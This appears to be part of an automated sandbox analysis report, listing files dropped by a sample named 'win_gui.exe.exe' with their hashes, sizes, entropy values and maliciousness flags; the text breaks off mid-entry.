                                SHA1:871A7A1592BD129CC8FE02EDF690A605DF13F65A
                                SHA-256:1826D98809E6CC3C1AE5A1E8AD65FFB73199E4F9C68E2CCAE8A0B44C99C29823
                                SHA-512:58255EDBBBF7991F53A2D695DCFD9D657F85AADBF3E360E33397FA09B86E817379B3F2A7B68EB27B0D07A20FCBD410046646C0F00BB9D2F1870B35780B246420
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13704
                                Entropy (8bit):7.986560984724494
                                Encrypted:false
                                SSDEEP:384:QUNBss3bHVzm9rCConw2LrIqZIgyE/y+VO/1o:5TLRqevnw2IqZIE/yu
                                MD5:E8CBC70132694E89A8A26FE6DD5C8B50
                                SHA1:67891AC5AE90A32A3066913E061705A3CF629DF2
                                SHA-256:04CFC0B3E4F63031BBF295CCEEDF85AA4DB348D6EDB69C125DF725552FB71727
                                SHA-512:BE0278A28380A556DF9C24BF8F4E857BADCD9D12AF7AC52AD276E116034AF567B39A91B7C3E2B8215FD55CBFB703923E477EC16358E6F6E95A91F74B4AC009D3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15645
                                Entropy (8bit):7.988756299726234
                                Encrypted:false
                                SSDEEP:384:P9qMTQK6ZdtPM7AGjOjUob2ZQ4CpybRMkpgf+4AjUjBPM+VOi:lfTQK6HGjOjUc4CpybRr++hYjCe
                                MD5:51A72D21CE85A1DC223BB5842D10C671
                                SHA1:C07C370BC51827451DC3C0F053E891E504F03A78
                                SHA-256:805607C18396BDA8371E6FFA22194F0FD7227C0E780B72AA3CFAAF21D046EDED
                                SHA-512:2A22743981DBC979A7C8437288903CF4C35E5D0447AA7AE7C1BDA992692A9529897AD4156089C227C8239BE0E4FA2660F1EB006B5DE75B09E9F7FD97473104FB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5965
                                Entropy (8bit):7.966620248686193
                                Encrypted:false
                                SSDEEP:96:9iK7RUhFx4dRQ1g1M2fehdEHO/kuvGr1VKPODsJnpexUb3jVeJNevuAVOE:RRu2RQ1g1M2fwEHOyKmDsLexUFeN+VOE
                                MD5:5D4AA59973679B2357124A3C4F01BBD7
                                SHA1:30775A68389470EA01188D376E9F897693ABEC01
                                SHA-256:AAEC878A40E9704E6A54388D76025F9177920C10D510508215BEEBE8E3DC0829
                                SHA-512:3002208BA32C9846D25EB4FE69E52C2EAE5495C285E3053DF3EE5D31D4AE4221A5CAABF1818F0C40D4B0C42AF3FA9B4268C3724EE36DFEF0985E8F530928D0D3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9906
                                Entropy (8bit):7.980330486140865
                                Encrypted:false
                                SSDEEP:192:iRVlBAlwFY2tKthX+g+5S5PYZbWKV4X4HIUc7ryAsFuughIumf9GbTAIyX+VOs:ixiu22An+g5PYZyK+oy7rqF4hEX+VOs
                                MD5:2F66A21AC0D9BC8078A4B97697C023EC
                                SHA1:47657B2AAD0082661119FF406134EC34EA27FA79
                                SHA-256:C0F82820DFA7A967C7EB063B925312D0DDDB38E8876812D3AEE0804483FBC502
                                SHA-512:BEBFE52472FBB3DE77E503869E74CDDBD5B0D34A4A131726F61F1480427EF9E1711B9DBC2C2FACA60A5B7637E3E14FE62CECBEE0B1C3C775A3DEF5E94E99CA92
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11560
                                Entropy (8bit):7.980960245105568
                                Encrypted:false
                                SSDEEP:192:C8zLfHklyDFdATQiIvkSocETjzp2CvHXIpPiayhA+dPRCVnR+VO7G:C8HkADFdAVxcET3NHYpP7b+VUz+VO6
                                MD5:F6A454AED91ACFEE159B161957C99D45
                                SHA1:F2B7032479182C903A9059C72BF7F9C5E128C62F
                                SHA-256:3F1879519706FE95C195C05DA47CA391736D18BAEA455AE94957FF290037BEA9
                                SHA-512:D4D03E83AA2F71E00C12AF7FDD44677BF471143DC5A736A13DEFF4EA20D334DDD401E6B226D37A7B6C9D2E65E0CEF1F1ED3B1A1C30B891DCD4C8CCE1BE13993B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9758
                                Entropy (8bit):7.981499585646969
                                Encrypted:false
                                SSDEEP:192:y3ekawL2mUzg/2g6WLQfIKMF4EWJxiZBGBiygdeQ+lWY+VOd6:y3ePw5UU6rq4EwxQYiypnf+VO4
                                MD5:B96E73782D709E1DE673AA52D62CFAA2
                                SHA1:84EDB9AB6E49421FC116DFF7E768D3784223DE05
                                SHA-256:78CA37EA400569C4EFB973A2E9FFEAA6386DECE03714DE624B2BD8683E6D095D
                                SHA-512:2B5EC5FF4F22ED346EAAB740296236970E309F76D9F6AE096C3FE71578DC40DE4280FAEF13A63743D516E8E315820CD0EC6884EA128868B65EDEE8BF2FA0E0EB
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):7.965002475642252
                                Encrypted:false
                                SSDEEP:96:6gJYtolNB9eVrLFAtamt/vXhZtFL4OmhDqe9O1GEwlToQevuAVO8:RS44LFAXvXJ54lhWwlMQ+VO8
                                MD5:3E7F258BE259EDC760DAB8128A5217D2
                                SHA1:478C4EFC83DAD938581BBB8EEE3F4F1E982DA603
                                SHA-256:BBC128D1295079C29BF369F97A2EEB0537457342734ECFCF69CCD8A93CE2EC87
                                SHA-512:6EF8FA7DFEAF32AC935EA3120DB5C67B6B22D416D8517CCADEC487FBD04DACA97E377A26BA46A0C9FFE1325353092056572DC772AA6D38928F67C1B712404FD3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8973
                                Entropy (8bit):7.9795168990353496
                                Encrypted:false
                                SSDEEP:192:yfBbxh4qT6MYVHFDTyo0HIJ+E66stC9sTh4PyLLg+VOnI:y9V5YtFDXv66stEKBLg+VOnI
                                MD5:7D1D093DED754E5ABB73FE75DAE16C41
                                SHA1:9D517784684BFC1D296356E56A9FB3EFEF87E715
                                SHA-256:B57655DEC8CA1F57331C92C43428BD8CDDA2B884B1932194A15B971AEFCFF863
                                SHA-512:C4BADE6C25A7C6CFB738DDEB6D52E0D7B2FF1266D136AD77E7F9FC2B6F39571597D0589B7A9E784748264EDE977B7F744479E3C56175AE2058CECCCEA380CEA7
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10175
                                Entropy (8bit):7.981887699423721
                                Encrypted:false
                                SSDEEP:192:GG5m8j0tiTXqZdH7j77E85/+xsQqRloVHMv6fYxfTEvPWU6+VOc:GsRSiuZdbj77BR+xsQtVV20g+VOc
                                MD5:24ADA18D4D5C039562543FBBBCF5A3EB
                                SHA1:0EB25620A1EA92F7D3F96F1E041F8FE6B46057D5
                                SHA-256:5DC8C2C79643235D8A33606278DB6C0393C90497371FE0F819CE94BC12750DE6
                                SHA-512:F07D6EC15B71785F9C19CAD6AE5E640E1E988CD8F66CF610AF69599526E032C1C56D86F1ADDFFAF4705D37F27836ACFA4ED2474282049CFB15AC14E410AA40A7
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17505
                                Entropy (8bit):7.989100344890263
                                Encrypted:false
                                SSDEEP:384:926kOQ59mePEPY0+TrdW5xh5PjMjzXtKZ1JeVlYs+/I8sYp5GLKldRE1+VOy:92T59PEPY0Cc5xh5rw5jnPYp5No1G
                                MD5:70F17355B3BF220E7351F9CFD8EC2B83
                                SHA1:2B89529B801128330F9FE6DEF754C46250CC260F
                                SHA-256:AEE26B3DA36F61D21A57CF10765685CF1DDD7B439F521987F3746A73039F764A
                                SHA-512:35A64194777E9172B1E5242C3C0C21A5AA1D13BCB3222AE2ABB94627B84773DD1C29B1FA50BDB87BCCB7FC63E0D682C978C6264972D783B6FF8C6A62AA1E409C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8518
                                Entropy (8bit):7.975991347258941
                                Encrypted:false
                                SSDEEP:192:3He1dgh/gj8ARbxGJvCUkn/Y14nfSsbKRz7roJQY+VO+7:3He1yywARbxeVE/KPrMX+VO+7
                                MD5:8AC3F5D08D5F9D843645656D4901A31D
                                SHA1:CCDED6DDA7D0EE87AEE780DC010B4052E943D3E9
                                SHA-256:4421F680173D875E5B6C38B88E36619F3225DB33E507BF8E23844BDAE2D69BC6
                                SHA-512:30014E53096174597112EE23E3F01F52B5F58E1008D6C676F8CA1F44AF4608FA62FCE0DB6716981ACF5D1D05C9E9BCD8B332654854008E73A14490B981863714
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5860
                                Entropy (8bit):7.967398328435115
                                Encrypted:false
                                SSDEEP:96:hTA9E78/QUzjyFTsDlgRajYfBfQXqF8AudWhDACOuHZi5RvUqf8Zb8ZiFAS60EyP:o6gGZ+qRajW4a5yWhDACerpf818k+zoP
                                MD5:DF5927319A8610B58FC401B83813B5C3
                                SHA1:3E2CB09DF3591EE58A736492286B582EEA935BC8
                                SHA-256:0AA9B9C12A7083A1E1B4CFC9F22D98F913AC47A0AEF50EA0F2B3CF93488E06BC
                                SHA-512:6FA25679250C9A2B32478E6F4C81DE41127906C29462AB431766EB43E427A949529D3B1C37166C34F0408D3A5A0851D5E36F23E716CCF9D849CF8AB3EF20244E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:COM executable for DOS
                                Category:dropped
                                Size (bytes):10647
                                Entropy (8bit):7.9808678299897595
                                Encrypted:false
                                SSDEEP:192:nxClIjRwcMf2bbawY5kmo7we0EC1HROB4fGs5nFpWAVirgYW+9Azn+1qhImq+VOx:slI1wZY5Y5kmo7sEC5cUGQqjWu8n7hI9
                                MD5:A8BF028267A207CA63204C496B3AFF8C
                                SHA1:B8F64C09A0211E8047E6C3A6BB52D5A7B01AAF30
                                SHA-256:752B412A67DF90FCBE57BD731BE5AA194F6A8B3CA975241D83A378D1044B053C
                                SHA-512:51C11F3E81DFBD858BA315247E169B788F99D69F46ED5232655CF3502D07555D035E7209F879D8C08B6CDECAF75061464FD83C1114197557FBB9A6AFA2308DF2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7679
                                Entropy (8bit):7.974972707129825
                                Encrypted:false
                                SSDEEP:192:ByKxdPQ4sPsrbh74f1JsQawIXcrcqfaCjKqG++VOb:EKxdPQ4DXh0cQaO7Tj5+VOb
                                MD5:0056E752BD77488889E1FBCF0D9CB371
                                SHA1:B2035C6D71137DD49D2BFC3BDD9B48DBDC62FACD
                                SHA-256:D310A211FE0177127D98BCFA8B593A16A70D203C961CF512FE1171525E3703AB
                                SHA-512:951D65C5E9A59E2E1FA4CD9288273A3D12E928C3FECB040B3FC5CB60D05EC26F0B3CABCFD0A9D9C39533DFC75615428847288BD445C8FB9A237A3F1205C6B3B0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9502
                                Entropy (8bit):7.975958883392602
                                Encrypted:false
                                SSDEEP:192:SB0lCqVhe7LQcdLhmKPEYDE8FCAqVkIEJKfGH+u6yWFEsT3BDmygr+VO28Y:+TqVY7LQcdL7EYHC7pLfGDnsz2r+VO2p
                                MD5:8D7F8C4326E490330715E2316E06A9BB
                                SHA1:3BB3C27AC20026C7E4FF803C3E2051C946A5414C
                                SHA-256:96CBCD71014C29748A0FC016A73AF75528BAF332A7C1A48356F50304B2013AF6
                                SHA-512:D551B60A5F7EF9BA7302E505E782F2E7414D9AD9BD9EF444AFC635066165CB3CF41C80684F5CDC100A0F3605602AEBC7B619BEC270BD1281F6B9DD2CBB28767F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8329
                                Entropy (8bit):7.978525790272492
                                Encrypted:false
                                SSDEEP:192:FJ2tbPU/kQOciOH9Z8+BRN8cJwKEB2RbenSefvQ+MFCr+4+VOkg:FJcbPQkQ9H9O+/BwBB2RzefvQlk+4+Vu
                                MD5:7DEBF0EDBA04E020DBFFFF1EACCEDDE0
                                SHA1:852DEACF54616ACF190771A9CF39F829BA39D204
                                SHA-256:163F9E5ECE752699B75B4CA8FA0D1420D1CFA92D684A8BA24CCCBB628CB01FF5
                                SHA-512:9003F770427FD0E47A23B20920FADCC7DFBD8275C225384C4A4337499D22CB84A62CA3A76852E14461FEEBF8895E71211A0181AF4AB6A8AD6DC2C2047D33F267
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14404
                                Entropy (8bit):7.987697832725955
                                Encrypted:false
                                SSDEEP:384:E+lGVyh8wxaPVQMG0ZaM/Br39ER5P94fBM3Igva9c2W+VOe:E+Uyh/xAQMGQaMZ+R9IBpoa9c2Wy
                                MD5:18E60EA09B615A27EDE66AD154BC1D39
                                SHA1:5365AB36CCD48BBCDDAD713A9FB6187EA0471B77
                                SHA-256:E954ACA33CAA2065B65E859C366E922ACE4765FB6FA9E176F2B9E47818805703
                                SHA-512:050D42C017A9346CD1ED4A1031DC47CAADABC3C4EBF0EE6347323DD83D92BFB64B5E11B9A67176C6A2CFB04CA02E21ACC6E79A9B573839ADF64E1EADDFBE6C4D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9639
                                Entropy (8bit):7.978504735634505
                                Encrypted:false
                                SSDEEP:192:SsQ2WL7DCcFcZycIv0OVWiPLvJ3CDfpKuOvX2AA3L9kWDtm5V+VOw:ETL7DCM8NTiPVSlK0L9kWDtm5V+VOw
                                MD5:66CBDC2FCADE453F68A4F2183EBBDA7E
                                SHA1:CDE14FF011E24892302F3E03AE06E2285EA87DAC
                                SHA-256:79B03424DC06F2124FEE0FBB49A31FABB82F11ED2DD04D7094230DFF554872FC
                                SHA-512:90F90FCA13347B6CFFE35E46B854701F23AD2A3B4D08BDB9C988F979F41DB38D27A90BCC40352EEF929A66D4790960998856D66E30B579F5F51E26C2668D217C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10518
                                Entropy (8bit):7.983045665488439
                                Encrypted:false
                                SSDEEP:192:ULZ0SCPJNYe9sgnu8VL2R2Kzf17Y2wEVJYOWKEebRlSWBGAkL8mqmu++VOY:UarqgnugLCA6YJsYWPkL87++VOY
                                MD5:1912280F96CE2958E3430656C91386CC
                                SHA1:9316C6A7BAB87331AF834E751592BE69589A8AFB
                                SHA-256:3A5763F7FE7E42726CB2D365D7F23816D6DE2F7EEDC83B4AB2511FFFAF7B3F03
                                SHA-512:4B308ACC58B913C15F3C081042B78449FA772F691115A3DE2A8179B74872994A8975A32494155E0940D79EAC919952D5C105AB83BBC93DE4DEDDF8B81BCC3F25
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8125
                                Entropy (8bit):7.976748587746032
                                Encrypted:false
                                SSDEEP:192:TGBmICO0y3d1kTS+0aMq3nV+FyYfJP9pQl4+VOW:CBXD0yfUwY3ngZfJPA4+VOW
                                MD5:5830E5A9DEA08D62187A3DA6FCA60766
                                SHA1:7C46CFAB2C100213CCDA3C63AE979D9E27D67138
                                SHA-256:0D6E9788DA910A85E8FB04702D84AAE81B5D544EA9BE9ABE4F8A72E4FC4EA6C6
                                SHA-512:5710DAA1B092688AF6EB8B54FDB01D391BF0B4A3EA24D171B221F2611DAA18252A38AF676B55C0EDCC1512420111F59A4A8EF883A9F114E504535991695E2028
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7041
                                Entropy (8bit):7.970777120808513
                                Encrypted:false
                                SSDEEP:192:3dFYiAE+G8LlUiL9f3jIjX40Qabb+gaKm+VO6:3d7+9BUiL9felbb+gQ+VO6
                                MD5:2D21F8A91C915AD30C2DB13460DAC1C4
                                SHA1:CCEE58C4459ACA66AF37F8CC4B9E14C85C666651
                                SHA-256:0090C6C08EC8C1F4518ECE18ADF1C05683C9A87A16DD3D9179C5BCFE7A333E98
                                SHA-512:303CEA15E5E89E8FAEC17E60DF5ED892874395CF92B04B8B8BE021FD86505B7E1165CDE4EAAE8503B9122BDB33BA55A2FFA02A77B98E48E6AB1D00BC37C9051F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8918
                                Entropy (8bit):7.980983576896489
                                Encrypted:false
                                SSDEEP:192:TwOCyWdUAFW3S60Cp5LZBN18CMc5RGHlpjylcrYxVX9lk1QTscB3w+VOx:0dyGUxS60OjB6peOrGlQ+VOx
                                MD5:82A8F6E768F0A90071FA616628078B25
                                SHA1:C8567B6A7A5F80FBD93EA425AA4E311474855C17
                                SHA-256:FBC7C02677EA2FED04A91877BB14CD6DFF9F53800AEA47B37AB51292EC6927B0
                                SHA-512:34493B78C56B50B6FD11630E0794289CC8650EC4E8C149846950874B9A2D61C5E6DE94DAE4594C753CCE58696AAC04E52A974B92A08D238A0D7B58CE9BB8541C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10221
                                Entropy (8bit):7.980138795487489
                                Encrypted:false
                                SSDEEP:192:jCvtigy/z6yDu/8iLKtgzXLKe+HBynvFbXPPFqoj5nIBPa+VOr:jKQH6yDu/8dgz7Ke+HCFzPEon2a+VOr
                                MD5:ACD8247D681AF7541255A1C4E0637CE4
                                SHA1:773356F6A905A93C7F53DBE9056462B0776790AC
                                SHA-256:E0BC28672997750E568A6651C90B13EC2AD695790E5ED8870908371ABC043DA9
                                SHA-512:0B07510F660216191F8351B422410C8203B80D53BC24F5EB2C873907049EF99ABF3D699596FB8689FCEF71976093C68ABF70FDA16BCF1E76C44748D9FD4B95C1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18377
                                Entropy (8bit):7.9892067294718085
                                Encrypted:false
                                SSDEEP:384:GJo/I5zciqfJQDsRCVuE0lcN9W8P7zw16NJm0sEm+VO7:Gy/oIiOJUsRCvvAc7zlSp/
                                MD5:322C004B41DFDD54D9623DB7C0B92A34
                                SHA1:1D47B2CA89838EA4FA18EA330166A9901E8CC30D
                                SHA-256:FC9B87F507EF7EE4DCA73972E4E2EE0EB0775DCAAB1AA96041607754B0FFD905
                                SHA-512:7460E3BE7AF93DC93BD193753F16FFFF4882A8EA337F629F7195E1E8B90473F39169374939D58CB93295E3E6DDF780F244F5BEB3CB3F3BC66FAEDFF303766563
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12012
                                Entropy (8bit):7.986846735176714
                                Encrypted:false
                                SSDEEP:192:E4XUMR98fLY2MCAWo0vu1FJuUFrbmKjwDx6P7HWRvhZudKMeL4pz+VO9:E4XUCOY2MVWmkUFrbTqOdGL4l+VO9
                                MD5:9424451CB31377E77985045E7B2FD192
                                SHA1:D86B77FEFD8D5C9FB36A87A8F5B46BE218078677
                                SHA-256:3F3DF4A28D25F2AEC7D5AC56FF2F7352F7A096AE2CF6A5DA719479032494DDA1
                                SHA-512:E85C3871943508F98F13C66DFBE3E773524758EA04D0444953B01E6F5D13989C48A5D1E2618F906FBC35A3C068889635A6E150D128DF3DBCE0531DBD09664132
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18479
                                Entropy (8bit):7.990377688213762
                                Encrypted:true
                                SSDEEP:384:WDVet87RUxsI5bMjnEB1pxQG+GscltMNbJXsmW8+VO8:Elk6Oy4QbJE8w
                                MD5:AC508C878336865B5224E1B2FAE37938
                                SHA1:21933C699032BA6DD3EF11F458FBEE9FB82A1116
                                SHA-256:5640247D3485C5A905EE2490285727EAF4CEA43FDBC4D94EE1F8710BAD889499
                                SHA-512:24D3BA17DB469292830D3088634E298A492368AF89FA95A9A9A46688B47B0266DD0EA04733169C6CD75BB299DA9FD8ED6B71D91A8B88593D41138D8F0A0DD2C9
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9225
                                Entropy (8bit):7.980955527480138
                                Encrypted:false
                                SSDEEP:192:3DCP55alR3A9+Hpo3BVgnGTCkvXB/G64OjyXcGlR3R+r3+VOZ:TCB543A4HG3Lkd0XB/aOusGlTK3+VOZ
                                MD5:81A32465134E5CD6DB528C77C79CE9B1
                                SHA1:23279F2121C57F28CA313370257C40602DB637F2
                                SHA-256:60496297AF461103B5BE1CED0719C7E2F9FB9772961C28FC7635FA9E623CDBAE
                                SHA-512:63525081599E1C7BC2B8D82A204A128628E5B0BE961E1359DB74B5AC11CBFC9D035F9EE5D1CB0D97FF14DF4C1832559AA72B6C933CA2D706D6206FEF86C15F4D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10785
                                Entropy (8bit):7.98298473647276
                                Encrypted:false
                                SSDEEP:192:XRc+Y4TGSNjvSm5THdu+ajX6pzXfft7dMsj0Bt6uOPqAPcGbN9vn+VOh:XRprTD7SmFHdaORt7dzjfxZ9vn+VOh
                                MD5:5301B9990DAA62C2217397E225B3B43F
                                SHA1:A250C986FE33644633AE4216D6EB95ED88C0CE04
                                SHA-256:D0532BF983037FBDAB6E43DBA83D41E6E8B7C99F9D12959473D8F166B192384D
                                SHA-512:D7CC3FDA18683B9695E7437103118AFAFBE473A9E77237FC0A45BEF460923B81AE116C948ADDC4B187C1C8E7925BEDA98A47CA1A2E7A64A04D9BCE720AAB2710
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14745
                                Entropy (8bit):7.9883261798609695
                                Encrypted:false
                                SSDEEP:384:VIopoTpVQVdPljFBnjSTDwCLHDs6znH/YAW+VOz:VIop4pV+PFoJsyH/gX
                                MD5:8E8D2780A242983BA058BEB27552B744
                                SHA1:B0BC04ACBE5FD060C6A7306DCCBA6442777ABAB4
                                SHA-256:055868CA39DF3B57FA34AAA102B896366D15CAE8FE4B4C4796C3F5FCB35BE6E4
                                SHA-512:E2C3356EC2B4A906C3CE68C965347BDD0407E71556879001F35E5FFB92C3F4802C86E3C41C5BABA84C9F44560978989807560B6DC5494FCFE96B76E84FDB5AEF
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9270
                                Entropy (8bit):7.980469599585448
                                Encrypted:false
                                SSDEEP:192:DWHqwyuWM0Sxr9BYE7Kmm1KpY1AjiKtDe8p2V4RO5lE+VO4:D6RBWMhxxBZm1h101VeAi5lE+VO4
                                MD5:ADD776800F8BBA4A276486D4F15D6CCB
                                SHA1:504D7CB286339316DA57D99FF6C5FF510FBB014C
                                SHA-256:3611FBB01C27B194CC7515412BCAEAFE6596DA35985AA321B890D75D3A4B02E5
                                SHA-512:5C37D09077A74989574758D02D93A92B4819DEF3F996126998B096738E5F8CF2B179472C593C170EE822E40F7AD619CD67E4E8B4B2EFBA280453D711D07D44F0
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5616
                                Entropy (8bit):7.964072352127057
                                Encrypted:false
                                SSDEEP:96:XtPDZ20X17KzIm7aT1XZoUGd5sORg0+nfrBPN63jHUF/Y4LAHhQUSkSKJZevuAVg:XBF2g2zXuXMG7nFwIF/VmhYg+VOF
                                MD5:0557BEF91C6731435CB3CD6EAAA8C109
                                SHA1:93CCA1F78A778C3AAD7503DB70F85165C59797A0
                                SHA-256:A5748FB737A2399B0A16C76E8AA7377686856305237C755F3456804A837BEB3D
                                SHA-512:5CBCF3D415EF88AC581EFA5576127027F2132B832E9FEA745977A1E00017F645BC79CBF55D15B121D42370EB8C0FE95ECEE7C4BE767F987F3DA2BE8005F10E1C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9354
                                Entropy (8bit):7.97977695978727
                                Encrypted:false
                                SSDEEP:192:MZ1up68yxW6CQdqpM0NbNKpzApSv4TJv9E5dqeWGagYAXNfxl/2Mp+VOU:MZc68ys6CQdeLNbwzA8cKXqLyY+fxl+D
                                MD5:013D6B68365103BB45ED7388CA3F0E4D
                                SHA1:FABAAA92AD3B5661DC1090912300089E9FAE1990
                                SHA-256:1771FDDC4F368570E1CE42FE795EF44C9F15FF29F8CF9A64332685FCC3F6C6A3
                                SHA-512:068526E17B2AAE4EBB478514F7B6976E953C026C654508A338D184E91699E898D4FC532A97707DA7006DC609F25577BAC251C3DD99CDCE8BEB3293AA39C4208F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10358
                                Entropy (8bit):7.981210340460779
                                Encrypted:false
                                SSDEEP:192:+jI7vDGGs8sE9J/n5hkVSWh1K/wvywJlqOFJHt5HzM+VOa:/7KT8FJhaVdhE+ywF/Ht5HzM+VOa
                                MD5:C5F97328FE61AC2B6785B57205EC80DB
                                SHA1:359C674154193C267EDF5C0D42131E00A2C5783B
                                SHA-256:5CEAD15011C1665BF43902D462B16DA87997D8A997A405BBAE05738BBBCC6091
                                SHA-512:8C1C7E0563A5947E25930D52EC7AC4FFA7125195903FC115A1BD3ABB36B8AC314ADD57C6ABC4F61318191E4BCB244823966214D2334A1B9CD3D8BA4614A80243
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):12825
                                Entropy (8bit):7.9859248602324415
                                Encrypted:false
                                SSDEEP:384:K6Q6uTKOR6FayV4RFv+YSHwHnAN5/XlmsEQ+VOx:Kd6M16VVUSHgif/HN
                                MD5:B55B46FA07238A1C0D87ED8D1C40CAE8
                                SHA1:3282BD119406D843F32B0F612302FAEB13406177
                                SHA-256:DF3240B03A8C7A50AF19608F1535A927CA6D4A6C14D2B34218A9B7BA7F655620
                                SHA-512:2711EA5A7DB61126D4ECC481F0F408821A9B52BA60817741DC5949EE0833EB489C2D60861994F4B82E708006558797855B00AE2FC02309FD8DCC4D43A618F7E2
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18811
                                Entropy (8bit):7.990457719482244
                                Encrypted:true
                                SSDEEP:384:8TEh5p/r5vLVn00nQ8I+VSNeKWi3mro/Z7SE6OO9dYjqqpw3+VOD:qEhr/rRZ0MQvtNPZmriZ7SJOgCOqpw3v
                                MD5:29317A6D6F2FE12AA164212865D33B58
                                SHA1:19D8DADE8E160945E1664941E644F42E1856DC61
                                SHA-256:19387460CB0B77758100F8D06E7280C1679D1B0F54AC8E723AA6E4D4E18BFED8
                                SHA-512:B115C916CC22D5DE5E0B685A1F6B19CEE996B915D3CBD6F69FC084072AB75763892BA23E84B68C201E23085B53CACD81ED43F3C5CF95CD3D8436DB1379C3078C
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8710
                                Entropy (8bit):7.977084547878187
                                Encrypted:false
                                SSDEEP:192:b+jxvr7w/PmPgAddHI3c7MNTinXd6VGDjFzBYoe31q+VOW:b+jxg/uxPH1yTcdGGLW31q+VOW
                                MD5:1A21749145197C7DBCCDC5756AF1E163
                                SHA1:D905C28F0A1DA646BF0167CD941CB5F0394A493A
                                SHA-256:EC1C22E6FFFA063C2A83689C11BBB7F58F1D21BA5070756A7A1FE11F939E26B4
                                SHA-512:B3BBB75D0130856D2253CA4A506714AC374BEDEE238326172BF7282C759BA3D1F9C754B9F45124894D30C65E8A93CE71B324ED6BF1C360020A158A0B23A11806
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):9197
                                Entropy (8bit):7.978323459863254
                                Encrypted:false
                                SSDEEP:192:E4RzOnZz/eE3kXVMoa/NwS779fDjC+5uCizGRelYuawcXAE+VO5:E4RzOnuW9lw2FN3iiAJcwE+VO5
                                MD5:8628A95F2872AD8CB3F8809F05AFF122
                                SHA1:406467632EE25F3328EBD376064E02784BA3FA15
                                SHA-256:B904FCC4DF8721248483794259BC60336070B5B091491455E25A57602307419A
                                SHA-512:ECA5BA21F6B9038998FA8A94DF505EF20BE562822C45C697A5484975929766603AB84A25BB70559F3364A8A91077815083D2A0488DB7556B7D4B82478903B18C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11340
                                Entropy (8bit):7.9844371796270694
                                Encrypted:false
